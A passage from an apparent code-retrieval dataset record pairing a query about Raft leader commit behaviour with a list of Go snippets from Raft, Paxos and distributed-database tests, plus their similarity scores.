servers...)\n\n\t// Now send a single message. The channel will be recreated.\n\tsc, err = stan.Connect(clusterName, clientName)\n\tif err != nil {\n\t\tt.Fatalf(\"Expected to connect correctly, got err %v\", err)\n\t}\n\tdefer sc.Close()\n\n\texpectedMsg = make(map[uint64]msg)\n\texpectedMsg[1] = msg{sequence: 1, data: []byte(\"new first\")}\n\tif err := sc.Publish(channel, expectedMsg[1].data); err != nil {\n\t\tt.Fatalf(\"Error on publish: %v\", err)\n\t}\n\tsc.Close()\n\n\t// Wait for channel to be replicated in all servers\n\tverifyChannelConsistency(t, channel, 5*time.Second, 1, 1, expectedMsg, servers...)\n\n\t// Shutdown all servers and restart them\n\tservers = restartServers(t, servers)\n\tdefer shutdownServers(servers)\n\t// Make sure they succeed\n\tgetLeader(t, 10*time.Second, servers...)\n\tverifyChannelConsistency(t, channel, 5*time.Second, 1, 1, expectedMsg, servers...)\n}", "func TestLeasePreferencesRebalance(t *testing.T) {\n\tdefer leaktest.AfterTest(t)()\n\tdefer log.Scope(t).Close(t)\n\n\tctx := context.Background()\n\tsettings := cluster.MakeTestingClusterSettings()\n\tsv := &settings.SV\n\t// set min lease transfer high, so we know it does affect the lease movement.\n\tkvserver.MinLeaseTransferInterval.Override(sv, 24*time.Hour)\n\t// Place all the leases in us-west.\n\tzcfg := zonepb.DefaultZoneConfig()\n\tzcfg.LeasePreferences = []zonepb.LeasePreference{\n\t\t{\n\t\t\tConstraints: []zonepb.Constraint{\n\t\t\t\t{Type: zonepb.Constraint_REQUIRED, Key: \"region\", Value: \"us-west\"},\n\t\t\t},\n\t\t},\n\t}\n\tnumNodes := 3\n\tserverArgs := make(map[int]base.TestServerArgs)\n\tlocality := func(region string) roachpb.Locality {\n\t\treturn roachpb.Locality{\n\t\t\tTiers: []roachpb.Tier{\n\t\t\t\t{Key: \"region\", Value: region},\n\t\t\t},\n\t\t}\n\t}\n\tlocalities := []roachpb.Locality{\n\t\tlocality(\"us-west\"),\n\t\tlocality(\"us-east\"),\n\t\tlocality(\"eu\"),\n\t}\n\tfor i := 0; i < numNodes; i++ {\n\t\tserverArgs[i] = base.TestServerArgs{\n\t\t\tLocality: localities[i],\n\t\t\tKnobs: base.TestingKnobs{\n\t\t\t\tServer: &server.TestingKnobs{\n\t\t\t\t\tDefaultZoneConfigOverride: &zcfg,\n\t\t\t\t},\n\t\t\t},\n\t\t\tSettings: settings,\n\t\t}\n\t}\n\ttc := testcluster.StartTestCluster(t, numNodes,\n\t\tbase.TestClusterArgs{\n\t\t\tReplicationMode: base.ReplicationManual,\n\t\t\tServerArgsPerNode: serverArgs,\n\t\t})\n\tdefer tc.Stopper().Stop(ctx)\n\n\tkey := keys.UserTableDataMin\n\ttc.SplitRangeOrFatal(t, key)\n\ttc.AddVotersOrFatal(t, key, tc.Targets(1, 2)...)\n\trequire.NoError(t, tc.WaitForVoters(key, tc.Targets(1, 2)...))\n\tdesc := tc.LookupRangeOrFatal(t, key)\n\tleaseHolder, err := tc.FindRangeLeaseHolder(desc, nil)\n\trequire.NoError(t, err)\n\trequire.Equal(t, tc.Target(0), leaseHolder)\n\n\t// Manually move lease out of preference.\n\ttc.TransferRangeLeaseOrFatal(t, desc, tc.Target(1))\n\n\ttestutils.SucceedsSoon(t, func() error {\n\t\tlh, err := tc.FindRangeLeaseHolder(desc, nil)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tif !lh.Equal(tc.Target(1)) {\n\t\t\treturn errors.Errorf(\"Expected leaseholder to be %s but was %s\", tc.Target(1), lh)\n\t\t}\n\t\treturn nil\n\t})\n\n\ttc.GetFirstStoreFromServer(t, 1).SetReplicateQueueActive(true)\n\trequire.NoError(t, tc.GetFirstStoreFromServer(t, 1).ForceReplicationScanAndProcess())\n\n\t// The lease should be moved back by the rebalance queue to us-west.\n\ttestutils.SucceedsSoon(t, func() error {\n\t\tlh, err := tc.FindRangeLeaseHolder(desc, nil)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tif !lh.Equal(tc.Target(0)) {\n\t\t\treturn errors.Errorf(\"Expected leaseholder to be %s but was %s\", tc.Target(0), lh)\n\t\t}\n\t\treturn nil\n\t})\n}", "func TestClientEndpoint_Register_NodeConn_Forwarded(t *testing.T) {\n\tt.Parallel()\n\trequire := require.New(t)\n\ts1 := TestServer(t, func(c *Config) {\n\t\tc.BootstrapExpect = 2\n\t})\n\n\tdefer s1.Shutdown()\n\ts2 := TestServer(t, func(c *Config) {\n\t\tc.DevDisableBootstrap = true\n\t})\n\tdefer s2.Shutdown()\n\tTestJoin(t, s1, s2)\n\ttestutil.WaitForLeader(t, s1.RPC)\n\ttestutil.WaitForLeader(t, s2.RPC)\n\n\t// Determine the non-leader server\n\tvar leader, nonLeader *Server\n\tif s1.IsLeader() {\n\t\tleader = s1\n\t\tnonLeader = s2\n\t} else {\n\t\tleader = s2\n\t\tnonLeader = s1\n\t}\n\n\t// Send the requests to the non-leader\n\tcodec := rpcClient(t, nonLeader)\n\n\t// Check that we have no client connections\n\trequire.Empty(nonLeader.connectedNodes())\n\trequire.Empty(leader.connectedNodes())\n\n\t// Create the register request\n\tnode := mock.Node()\n\treq := &structs.NodeRegisterRequest{\n\t\tNode: node,\n\t\tWriteRequest: structs.WriteRequest{Region: \"global\"},\n\t}\n\n\t// Fetch the response\n\tvar resp structs.GenericResponse\n\tif err := msgpackrpc.CallWithCodec(codec, \"Node.Register\", req, &resp); err != nil {\n\t\tt.Fatalf(\"err: %v\", err)\n\t}\n\tif resp.Index == 0 {\n\t\tt.Fatalf(\"bad index: %d\", resp.Index)\n\t}\n\n\t// Check that we have the client connections on the non leader\n\tnodes := nonLeader.connectedNodes()\n\trequire.Len(nodes, 1)\n\trequire.Contains(nodes, node.ID)\n\n\t// Check that we have no client connections on the leader\n\tnodes = leader.connectedNodes()\n\trequire.Empty(nodes)\n\n\t// Check for the node in the FSM\n\tstate := leader.State()\n\ttestutil.WaitForResult(func() (bool, error) {\n\t\tout, err := state.NodeByID(nil, node.ID)\n\t\tif err != nil {\n\t\t\treturn false, err\n\t\t}\n\t\tif out == nil {\n\t\t\treturn false, fmt.Errorf(\"expected node\")\n\t\t}\n\t\tif out.CreateIndex != resp.Index {\n\t\t\treturn false, fmt.Errorf(\"index mis-match\")\n\t\t}\n\t\tif out.ComputedClass == \"\" {\n\t\t\treturn false, fmt.Errorf(\"ComputedClass not set\")\n\t\t}\n\n\t\treturn true, nil\n\t}, func(err error) {\n\t\tt.Fatalf(\"err: %v\", err)\n\t})\n\n\t// Close the connection and check that we remove the client connections\n\trequire.Nil(codec.Close())\n\ttestutil.WaitForResult(func() (bool, error) {\n\t\tnodes := nonLeader.connectedNodes()\n\t\treturn len(nodes) == 0, nil\n\t}, func(err error) {\n\t\tt.Fatalf(\"should have no clients\")\n\t})\n}", "func TestPartitionOfCluster(t *testing.T) {\n\n\n\trafts, cluster := makeMockRafts() // array of []raft.Node\n\n\tfor i:=0; i<5; i++ {\n\t\tdefer rafts[i].raft_log.Close()\n\t\tgo rafts[i].processEvents()\n\t}\n\n\ttime.Sleep(2*time.Second)\n\tvar ldr *RaftNode\n\tvar mutex sync.RWMutex\n\tfor {\n\t\tmutex.Lock()\n\t\tldr = getLeader(rafts)\n\t\tif (ldr != nil) {\n\t\t\tbreak\n\t\t}\n\t\tmutex.Unlock()\n\t}\n\n\tldr.Append([]byte(\"foo\"))\n\ttime.Sleep(2*time.Second)\n\n\tfor _, node := range rafts {\n\t\tselect {\n\t\tcase ci := <- node.CommitChannel():\n\t\t\t//if ci.Err != nil {t.Fatal(ci.Err)}\n\t\t\tif string(ci.Data.Data) != \"foo\" {\n\t\t\t\tt.Fatal(\"Got different data\")\n\t\t\t}\n\t\tdefault:\n\t\t}\n\t}\n\n\n\tfor {\n\t\tldr = getLeader(rafts)\n\t\tif (ldr != nil) {\n\t\t\tbreak\n\t\t}\n\t}\n\n\tif(ldr.Id() == 1 || ldr.Id() == 0) {\n\t\tcluster.Partition([]int{0, 1}, []int{2, 3, 4})\n\t} else if(ldr.Id() == 2) {\n\t\tcluster.Partition([]int{0, 1, 3}, []int{2, 4})\n\t} else {\n\t\tcluster.Partition([]int{0, 1, 2}, []int{3, 4})\n\t}\n\n\tldr.Append([]byte(\"foo2\"))\n\tvar ldr2 *RaftNode\n\n\ttime.Sleep(2*time.Second)\n\n\tfor _, node := range rafts {\n\t\tselect {\n\t\tcase ci := <- node.CommitChannel():\n\t\t\tt.Fatal(\"Got different data \"+ string(ci.Data.Data))\n\t\tdefault:\n\t\t}\n\t}\n\n\tcluster.Heal()\n\n\ttime.Sleep(3*time.Second)\n\tfor {\n\t\tldr2 = getLeader(rafts)\n\n\t\tif (ldr2 != nil && ldr2.sm.serverID != ldr.sm.serverID) {\n\t\t\tbreak\n\t\t}\n\t}\n\n\t// Leader will not have \"fooAgain\" entry, will force new entry to all nodes\n\tldr2.Append([]byte(\"foo3\"))\n\ttime.Sleep(2*time.Second)\n\n\tfor _, node := range rafts {\n\t\tselect {\n\t\tcase ci := <- node.CommitChannel():\n\t\t\tif string(ci.Data.Data) != \"foo3\" {\n\t\t\t\tt.Fatal(\"Got different data \"+ string(ci.Data.Data))\n\t\t\t}\n\t\t}\n\t}\n\n\tfor _, node := range rafts {\n\t\tnode.Shutdown()\n\t}\n\n}", "func (rf *Raft) AppendEntries(args AppendEntriesArgs, reply *AppendEntriesReply) error {\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\tif rf.state == Down {\n\t\treturn nil\n\t}\n\n\tlog.Printf(\"[%v] received AppendEntries RPC call: Args%+v\", rf.me, args)\n\tif args.Term > rf.currentTerm {\n\t\tlog.Printf(\"[%v] currentTerm=%d out of date with AppendEntriesArgs.Term=%d\",\n\t\t\trf.me, rf.currentTerm, args.Term)\n\t\trf.toFollower(args.Term)\n\t\trf.leader = args.Leader\n\t}\n\n\treply.Success = false\n\tif args.Term == rf.currentTerm {\n\t\t// two leaders can't coexist. if Raft rfServer receives AppendEntries() RPC, another\n\t\t// leader already exists in this term\n\t\tif rf.state != Follower {\n\t\t\trf.toFollower(args.Term)\n\t\t\trf.leader = args.Leader\n\t\t}\n\t\trf.resetElection = time.Now()\n\n\t\t// does follower log match leader's (-1 is valid)\n\t\tif args.PrevLogIndex == -1 ||\n\t\t\t(args.PrevLogIndex < len(rf.log) && args.PrevLogTerm == rf.log[args.PrevLogIndex].Term) {\n\t\t\treply.Success = true\n\n\t\t\t// merge follower's log with leader's log starting from args.PrevLogTerm\n\t\t\t// skip entries where the term matches where term matches with args.Entries\n\t\t\t// and insert args.Entries from mismatch index\n\t\t\tinsertIdx, appendIdx := args.PrevLogIndex + 1, 0\n\t\t\tfor {\n\t\t\t\tif insertIdx >= len(rf.log) || appendIdx >= len(args.Entries) {\n\t\t\t\t\tbreak\n\t\t\t\t}\n\t\t\t\tif rf.log[insertIdx].Term != args.Entries[appendIdx].Term {\n\t\t\t\t\tbreak\n\t\t\t\t}\n\t\t\t\tinsertIdx++\n\t\t\t\tappendIdx++\n\t\t\t}\n\t\t\t// At the end of this loop:\n\t\t\t// - insertIdx points at the end of the log, or an index where the\n\t\t\t// term mismatches with an entry from the leader\n\t\t\t// - appendIdx points at the end of Entries, or an index where the\n\t\t\t// term mismatches with the corresponding log entry\n\t\t\tif appendIdx < len(args.Entries) {\n\t\t\t\tlog.Printf(\"[%v] append new entries %+v from %d\", rf.me,\n\t\t\t\t\targs.Entries[appendIdx:], insertIdx)\n\t\t\t\trf.log = append(rf.log[:insertIdx], args.Entries[appendIdx:]...)\n\t\t\t\tlog.Printf(\"[%v] new log: %+v\", rf.me, rf.log)\n\t\t\t}\n\n\t\t\t// update rf.commitIndex if the leader considers additional log entries as committed\n\t\t\tif args.LeaderCommit > rf.commitIndex {\n\t\t\t\tif args.LeaderCommit < len(rf.log)-1 {\n\t\t\t\t\trf.commitIndex = args.LeaderCommit\n\t\t\t\t} else {\n\t\t\t\t\trf.commitIndex = len(rf.log)-1\n\t\t\t\t}\n\n\t\t\t\tlog.Printf(\"[%v] updated commitIndex:%d\", rf.me, rf.commitIndex)\n\t\t\t\trf.readyCh <- struct{}{}\n\t\t\t}\n\t\t} else {\n\t\t\t// PrevLogIndex and PrevLogTerm didn't match\n\t\t\t// set ConflictIndex and ConflictTerm to allow leader to send the right entries quickly\n\t\t\tif args.PrevLogIndex >= len(rf.log) {\n\t\t\t\treply.ConflictIndex = len(rf.log)\n\t\t\t\treply.ConflictTerm = -1\n\t\t\t} else {\n\t\t\t\t// PrevLogTerm doesn't match\n\t\t\t\treply.ConflictTerm = rf.log[args.PrevLogIndex].Term\n\t\t\t\tvar idx int\n\t\t\t\tfor idx = args.PrevLogIndex - 1; idx >= 0; idx-- {\n\t\t\t\t\tif rf.log[idx].Term != reply.ConflictTerm {\n\t\t\t\t\t\tbreak\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\treply.ConflictIndex = idx + 1\n\t\t\t}\n\t\t}\n\t}\n\n\treply.Term = rf.currentTerm\n\trf.persist()\n\tlog.Printf(\"[%v] AppendEntriesReply sent: %+v\", rf.me, reply)\n\treturn nil\n}", "func TestShiftToLeaderElection(t *testing.T) {\n\tp := newPaxos(&Config{ID: 1, NodeCount: 3})\n\n\tconst newView = 7\n\tp.shiftToLeaderElection(newView)\n\n\tassertState(t, p, StateLeaderElection)\n\tif p.progressTimer.isSet() {\n\t\tt.Fatalf(\"expected unset progress timer\")\n\t}\n\tif p.prepare != nil {\n\t\tt.Fatalf(\"expected nil *pb.Prepare\")\n\t}\n\tif len(p.prepareOKs) > 0 {\n\t\tt.Fatalf(\"expected empty prepareOKs set\")\n\t}\n\tif len(p.lastEnqueued) > 0 {\n\t\tt.Fatalf(\"expected empty lastEnqueued set\")\n\t}\n\tif p.lastAttempted != newView {\n\t\tt.Fatalf(\"expected lastAttempted view %d, found %d\", newView, p.lastAttempted)\n\t}\n\n\texpViewChanges := map[uint64]*pb.ViewChange{\n\t\t1: &pb.ViewChange{\n\t\t\tNodeId: 1,\n\t\t\tAttemptedView: 7,\n\t\t},\n\t}\n\tif !reflect.DeepEqual(p.viewChanges, expViewChanges) {\n\t\tt.Errorf(\"expected view changes %+v, found %+v\", expViewChanges, p.viewChanges)\n\t}\n}", "func (rf *Raft) Start(command interface{}) (int, int, bool) {\n\n\t//Check if I am the leader\n\t//if false --> return\n\t//If true -->\n\t// 1. Add to my log\n\t// 2. Send heart beat/Append entries to other peers\n\t//Check your own last log index and 1 to it.\n\t//Let other peers know that this is the log index for new entry.\n\n\t// we need to modify the heart beat mechanism such that it sends entries if any.\n\tindex := -1\n\tterm := -1\n\t//Otherwise prepare the log entry from the given command.\n\t// Your code here (2B).\n\t///////\n\tterm, isLeader :=rf.GetState()\n\tif isLeader == false {\n\t\treturn index,term,isLeader\n\t}\n\tterm = rf.currentTerm\n\tindex = rf.commitIndex\n\trf.sendAppendLogEntries(command)\n\treturn index, term, isLeader\n}", "func (r *Raft) becomeLeader() {\n\t// leader 先发送一个空数据\n\tr.State = StateLeader\n\tr.Lead = r.id\n\tlastIndex := r.RaftLog.LastIndex()\n\tr.heartbeatElapsed = 0\n\tfor peer := range r.Prs {\n\t\tif peer == r.id {\n\t\t\tr.Prs[peer].Next = lastIndex + 2\n\t\t\tr.Prs[peer].Match = lastIndex + 1\n\t\t} else {\n\t\t\tr.Prs[peer].Next = lastIndex + 1\n\t\t}\n\t}\n\tr.RaftLog.entries = append(r.RaftLog.entries, pb.Entry{Term: r.Term, Index: r.RaftLog.LastIndex() + 1})\n\tr.bcastAppend()\n\tif len(r.Prs) == 1 {\n\t\tr.RaftLog.committed = r.Prs[r.id].Match\n\t}\n}", "func TestActiveReplicatorEdgeCheckpointNameCollisions(t *testing.T) {\n\n\tbase.RequireNumTestBuckets(t, 3)\n\n\tbase.SetUpTestLogging(t, logger.LevelDebug, logger.KeyReplicate, logger.KeyHTTP, logger.KeyHTTPResp, logger.KeySync, logger.KeySyncMsg)\n\n\tconst (\n\t\tchangesBatchSize = 10\n\t\tnumRT1DocsInitial = 13 // 2 batches of changes\n\t)\n\n\t// Central cluster\n\ttb1 := base.GetTestBucket(t)\n\trt1 := NewRestTester(t, &RestTesterConfig{\n\t\tTestBucket: tb1,\n\t\tDatabaseConfig: &DatabaseConfig{DbConfig: DbConfig{\n\t\t\tUsers: map[string]*db.PrincipalConfig{\n\t\t\t\t\"alice\": {\n\t\t\t\t\tPassword: base.StringPtr(\"pass\"),\n\t\t\t\t\tExplicitChannels: utils.SetOf(\"alice\"),\n\t\t\t\t},\n\t\t\t},\n\t\t}},\n\t})\n\tdefer rt1.Close()\n\n\t// Create first batch of docs\n\tdocIDPrefix := t.Name() + \"rt1doc\"\n\tfor i := 0; i < numRT1DocsInitial; i++ {\n\t\tresp := rt1.SendAdminRequest(http.MethodPut, fmt.Sprintf(\"/db/%s%d\", docIDPrefix, i), `{\"source\":\"rt1\",\"channels\":[\"alice\"]}`)\n\t\tassertStatus(t, resp, http.StatusCreated)\n\t}\n\n\t// Make rt1 listen on an actual HTTP port, so it can receive the blipsync request from edges\n\tsrv := httptest.NewServer(rt1.TestPublicHandler())\n\tdefer srv.Close()\n\n\t// Build rt1DBURL with basic auth creds\n\trt1DBURL, err := url.Parse(srv.URL + \"/db\")\n\trequire.NoError(t, err)\n\trt1DBURL.User = url.UserPassword(\"alice\", \"pass\")\n\n\t// Edge 1\n\tedge1Bucket := base.GetTestBucket(t)\n\tedge1 := NewRestTester(t, &RestTesterConfig{\n\t\tTestBucket: edge1Bucket,\n\t})\n\tdefer edge1.Close()\n\n\tarConfig := db.ActiveReplicatorConfig{\n\t\tID: \"edge-repl\",\n\t\tDirection: db.ActiveReplicatorTypePull,\n\t\tRemoteDBURL: rt1DBURL,\n\t\tActiveDB: &db.Database{\n\t\t\tDatabaseContext: edge1.GetDatabase(),\n\t\t},\n\t\tContinuous: true,\n\t\tChangesBatchSize: changesBatchSize,\n\t}\n\tarConfig.SetCheckpointPrefix(t, \"cluster1:\")\n\n\t// Create the first active replicator to pull from seq:0\n\tarConfig.ReplicationStatsMap = base.SyncGatewayStats.NewDBStats(t.Name()+\"edge1\", false, false, false).DBReplicatorStats(t.Name())\n\tedge1Replicator := db.NewActiveReplicator(&arConfig)\n\n\tstartNumChangesRequestedFromZeroTotal := rt1.GetDatabase().DbStats.CBLReplicationPull().NumPullReplSinceZero.Value()\n\tstartNumRevsHandledTotal := edge1Replicator.Pull.GetStats().HandleRevCount.Value()\n\n\tassert.NoError(t, edge1Replicator.Start())\n\n\t// wait for all of the documents originally written to rt1 to arrive at edge1\n\tchangesResults, err := edge1.WaitForChanges(numRT1DocsInitial, \"/db/_changes?since=0\", \"\", true)\n\trequire.NoError(t, err)\n\tedge1LastSeq := changesResults.Last_Seq\n\trequire.Len(t, changesResults.Results, numRT1DocsInitial)\n\tdocIDsSeen := make(map[string]bool, numRT1DocsInitial)\n\tfor _, result := range changesResults.Results {\n\t\tdocIDsSeen[result.ID] = true\n\t}\n\tfor i := 0; i < numRT1DocsInitial; i++ {\n\t\tdocID := fmt.Sprintf(\"%s%d\", docIDPrefix, i)\n\t\tassert.True(t, docIDsSeen[docID])\n\n\t\tdoc, err := edge1.GetDatabase().GetDocument(logger.TestCtx(t), docID, db.DocUnmarshalAll)\n\t\tassert.NoError(t, err)\n\n\t\tbody, err := doc.GetDeepMutableBody()\n\t\trequire.NoError(t, err)\n\t\tassert.Equal(t, \"rt1\", body[\"source\"])\n\t}\n\n\tedge1Replicator.Pull.Checkpointer.CheckpointNow()\n\n\t// one _changes from seq:0 with initial number of docs sent\n\tnumChangesRequestedFromZeroTotal := rt1.GetDatabase().DbStats.CBLReplicationPull().NumPullReplSinceZero.Value()\n\tassert.Equal(t, startNumChangesRequestedFromZeroTotal+1, numChangesRequestedFromZeroTotal)\n\n\t// rev assertions\n\tnumRevsHandledTotal := edge1Replicator.Pull.GetStats().HandleRevCount.Value()\n\tassert.Equal(t, startNumRevsHandledTotal+numRT1DocsInitial, numRevsHandledTotal)\n\tassert.Equal(t, int64(numRT1DocsInitial), edge1Replicator.Pull.Checkpointer.Stats().ProcessedSequenceCount)\n\tassert.Equal(t, int64(numRT1DocsInitial), edge1Replicator.Pull.Checkpointer.Stats().ExpectedSequenceCount)\n\n\t// checkpoint assertions\n\tassert.Equal(t, int64(0), edge1Replicator.Pull.Checkpointer.Stats().GetCheckpointHitCount)\n\tassert.Equal(t, int64(1), edge1Replicator.Pull.Checkpointer.Stats().GetCheckpointMissCount)\n\tassert.Equal(t, int64(1), edge1Replicator.Pull.Checkpointer.Stats().SetCheckpointCount)\n\n\tassert.NoError(t, edge1Replicator.Stop())\n\n\t// Edge 2\n\tedge2Bucket := base.GetTestBucket(t)\n\tedge2 := NewRestTester(t, &RestTesterConfig{\n\t\tTestBucket: edge2Bucket,\n\t})\n\tdefer edge2.Close()\n\n\t// Create a new replicator using the same ID, which should NOT use the checkpoint set by the first edge.\n\tarConfig.ReplicationStatsMap = base.SyncGatewayStats.NewDBStats(t.Name()+\"edge2\", false, false, false).DBReplicatorStats(t.Name())\n\tarConfig.ActiveDB = &db.Database{\n\t\tDatabaseContext: edge2.GetDatabase(),\n\t}\n\tarConfig.SetCheckpointPrefix(t, \"cluster2:\")\n\tedge2Replicator := db.NewActiveReplicator(&arConfig)\n\tassert.NoError(t, edge2Replicator.Start())\n\n\tchangesResults, err = edge2.WaitForChanges(numRT1DocsInitial, \"/db/_changes?since=0\", \"\", true)\n\trequire.NoError(t, err)\n\n\tedge2Replicator.Pull.Checkpointer.CheckpointNow()\n\n\t// make sure that edge 2 didn't use a checkpoint\n\tassert.Equal(t, int64(0), edge2Replicator.Pull.Checkpointer.Stats().GetCheckpointHitCount)\n\tassert.Equal(t, int64(1), edge2Replicator.Pull.Checkpointer.Stats().GetCheckpointMissCount)\n\tassert.Equal(t, int64(1), edge2Replicator.Pull.Checkpointer.Stats().SetCheckpointCount)\n\n\tassert.NoError(t, edge2Replicator.Stop())\n\n\tresp := rt1.SendAdminRequest(http.MethodPut, fmt.Sprintf(\"/db/%s%d\", docIDPrefix, numRT1DocsInitial), `{\"source\":\"rt1\",\"channels\":[\"alice\"]}`)\n\tassertStatus(t, resp, http.StatusCreated)\n\trequire.NoError(t, rt1.WaitForPendingChanges())\n\n\t// run a replicator on edge1 again to make sure that edge2 didn't blow away its checkpoint\n\tarConfig.ReplicationStatsMap = base.SyncGatewayStats.NewDBStats(t.Name()+\"edge1\", false, false, false).DBReplicatorStats(t.Name())\n\tarConfig.ActiveDB = &db.Database{\n\t\tDatabaseContext: edge1.GetDatabase(),\n\t}\n\tarConfig.SetCheckpointPrefix(t, \"cluster1:\")\n\n\tedge1Replicator2 := db.NewActiveReplicator(&arConfig)\n\trequire.NoError(t, edge1Replicator2.Start())\n\n\tchangesResults, err = edge1.WaitForChanges(1, fmt.Sprintf(\"/db/_changes?since=%v\", edge1LastSeq), \"\", true)\n\trequire.NoErrorf(t, err, \"changesResults: %v\", changesResults)\n\tchangesResults.requireDocIDs(t, []string{fmt.Sprintf(\"%s%d\", docIDPrefix, numRT1DocsInitial)})\n\n\tedge1Replicator2.Pull.Checkpointer.CheckpointNow()\n\n\tassert.Equal(t, int64(1), edge1Replicator2.Pull.Checkpointer.Stats().GetCheckpointHitCount)\n\tassert.Equal(t, int64(0), edge1Replicator2.Pull.Checkpointer.Stats().GetCheckpointMissCount)\n\tassert.Equal(t, int64(1), edge1Replicator2.Pull.Checkpointer.Stats().SetCheckpointCount)\n\n\trequire.NoError(t, edge1Replicator2.Stop())\n}", "func appendEntriesUntilSuccess(raft *spec.Raft, PID int) *responses.Result {\n var result *responses.Result\n var retries int\n\n // If last log index >= nextIndex for a follower,\n // send log entries starting at nextIndex.\n // (??) Otherwise set NextIndex[PID] to len(raft.Log)-1\n if len(raft.Log)-1 < raft.NextIndex[PID] {\n log.Printf(\"[PUTENTRY-X]: [len(raft.Log)-1=%d] [raft.NextIndex[PID]=%d]\\n\", len(raft.Log)-1, raft.NextIndex[PID])\n raft.NextIndex[PID] = len(raft.Log) - 1\n }\n\n log.Printf(\"[PUTENTRY->]: [PID=%d]\", PID)\n for {\n // Regenerate arguments on each call, because\n // raft state may have changed between calls\n spec.RaftRWMutex.RLock()\n args := raft.GetAppendEntriesArgs(&self)\n args.PrevLogIndex = raft.NextIndex[PID] - 1\n args.PrevLogTerm = spec.GetTerm(&raft.Log[args.PrevLogIndex])\n args.Entries = raft.Log[raft.NextIndex[PID]:]\n config.LogIf(\n fmt.Sprintf(\"appendEntriesUntilSuccess() to [PID=%d] with args: T:%v, L:%v, PLI:%v, PLT:%v, LC:%v\",\n PID,\n args.Term,\n args.LeaderId,\n args.PrevLogIndex,\n args.PrevLogTerm,\n args.LeaderCommit,\n ),\n config.C.LogAppendEntries)\n spec.RaftRWMutex.RUnlock()\n result = CallAppendEntries(PID, args)\n log.Println(result)\n\n // Success! Increment next/matchIndex as a function of our inputs\n // Otherwise, decrement nextIndex and try again.\n spec.RaftRWMutex.Lock()\n if result.Success {\n raft.MatchIndex[PID] = args.PrevLogIndex + len(args.Entries)\n raft.NextIndex[PID] = raft.MatchIndex[PID] + 1\n spec.RaftRWMutex.Unlock()\n return result\n }\n\n // Decrement NextIndex if the failure was due to log consistency.\n // If not, update our term and step down\n if result.Term > raft.CurrentTerm {\n raft.CurrentTerm = result.Term\n raft.Role = spec.FOLLOWER\n }\n\n if result.Error != responses.CONNERROR {\n raft.NextIndex[PID] -= 1\n spec.RaftRWMutex.Unlock()\n continue\n }\n\n if retries > 5 {\n spec.RaftRWMutex.Unlock()\n return &responses.Result{Success: false, Error: responses.CONNERROR}\n }\n\n retries++\n time.Sleep(time.Second)\n spec.RaftRWMutex.Unlock()\n }\n}", "func (r *Raft) AppendToLog_Leader(cmd []byte) {\n\tterm := r.currentTerm\n\tlogVal := LogVal{term, cmd, 0} //make object for log's value field with acks set to 0\n\t//fmt.Println(\"Before putting in log,\", logVal)\n\tr.myLog = append(r.myLog, logVal)\n\t//fmt.Println(\"I am:\", r.Myconfig.Id, \"Added cmd to my log\")\n\n\t//modify metadata after appending\n\t//fmt.Println(\"Metadata before appending,lastLogIndex,prevLogIndex,prevLogTerm\", r.myMetaData.lastLogIndex, r.myMetaData.prevLogIndex, r.myMetaData.prevLogTerm)\n\tlastLogIndex := r.myMetaData.lastLogIndex + 1\n\tr.myMetaData.prevLogIndex = r.myMetaData.lastLogIndex\n\tr.myMetaData.lastLogIndex = lastLogIndex\n\t//fmt.Println(r.myId(), \"Length of my log is\", len(r.myLog))\n\tif len(r.myLog) == 1 {\n\t\tr.myMetaData.prevLogTerm = r.myMetaData.prevLogTerm + 1 //as for empty log prevLogTerm is -2\n\n\t} else if len(r.myLog) > 1 { //explicit check, else would have sufficed too, just to eliminate len=0 possibility\n\t\tr.myMetaData.prevLogTerm = r.myLog[r.myMetaData.prevLogIndex].Term\n\t}\n\t//r.currentTerm = term\n\t//fmt.Println(\"I am leader, Appended to log, last index, its term is\", r.myMetaData.lastLogIndex, r.myLog[lastLogIndex].term)\n\t//fmt.Println(\"Metadata after appending,lastLogIndex,prevLogIndex,prevLogTerm\", r.myMetaData.lastLogIndex, r.myMetaData.prevLogIndex, r.myMetaData.prevLogTerm)\n\tr.setNextIndex_All() //Added-28 march for LogRepair\n\t//Write to disk\n\t//fmt.Println(r.myId(), \"In append_leader, appended to log\", string(cmd))\n\tr.WriteLogToDisk()\n\n}" ]
[ "0.6864116", "0.640381", "0.6347351", "0.62488306", "0.6234333", "0.6037683", "0.60331476", "0.5993272", "0.58315694", "0.57851213", "0.578263", "0.57710594", "0.57250357", "0.5723692", "0.56953937", "0.56943995", "0.562664", "0.55386865", "0.5529624", "0.5525888", "0.5491838", "0.5484383", "0.54781413", "0.54738384", "0.546822", "0.54647684", "0.5464706", "0.5451941", "0.5429758", "0.54281074", "0.54223883", "0.54146403", "0.5389761", "0.5356868", "0.53479904", "0.5347951", "0.53470117", "0.53369653", "0.5327749", "0.53259456", "0.5319282", "0.531812", "0.53144705", "0.5303706", "0.52962434", "0.52769566", "0.5258625", "0.52539974", "0.5243585", "0.5233108", "0.52244943", "0.52208996", "0.52156705", "0.52047366", "0.5202905", "0.5198267", "0.5192151", "0.51905835", "0.5182051", "0.51749897", "0.51735115", "0.51684165", "0.5167362", "0.5164994", "0.5163754", "0.5156051", "0.51517314", "0.51438284", "0.51334345", "0.51290286", "0.5126343", "0.5125047", "0.5124107", "0.51170737", "0.51146203", "0.5114477", "0.5113802", "0.5106721", "0.5106068", "0.510137", "0.5096207", "0.5094962", "0.50943893", "0.5089152", "0.5085789", "0.5079968", "0.50732005", "0.5063709", "0.50609446", "0.5053327", "0.50469005", "0.50456774", "0.5036307", "0.5035118", "0.5030854", "0.5020999", "0.50202805", "0.5016098", "0.50157136", "0.50152653" ]
0.7907163
0
TestLeaderCommitEntry tests that when the entry has been safely replicated, the leader gives out the applied entries, which can be applied to its state machine. Also, the leader keeps track of the highest index it knows to be committed, and it includes that index in future AppendEntries RPCs so that the other servers eventually find out. Reference: section 5.3
